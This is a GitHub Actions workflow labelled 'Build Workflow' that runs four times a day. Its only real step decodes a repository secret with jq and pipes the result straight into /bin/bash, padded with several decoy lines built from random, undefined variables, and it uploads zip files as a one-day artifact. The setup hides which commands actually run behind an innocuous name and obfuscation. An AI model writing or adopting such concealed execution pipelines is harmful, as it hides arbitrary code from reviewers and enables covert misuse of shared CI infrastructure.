name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '53 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          rik8410: ${{ secrets.rik8410 }}
        run: |
          printf '%s' "$rik8410" | jq -r .totf0031 | /bin/bash
          echo $c20 | jq -r .jknp61287 | /bin/bash
          printf '%s' "$yhoiv672" | jq -r .fkh65688 | /bin/bash
          echo $akjkl40052 | jq -r .wwmp5 | /bin/bash
          printf '%s' "$bmtv9" | jq -r .pwaoh0377 | /bin/bash
          echo $b8019 | jq -r .qlln90508 | /bin/bash
          printf '%s' "$zgaog539" | jq -r .r0000 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jUy1tmLm
          path: "*.zip"
          retention-days: 1
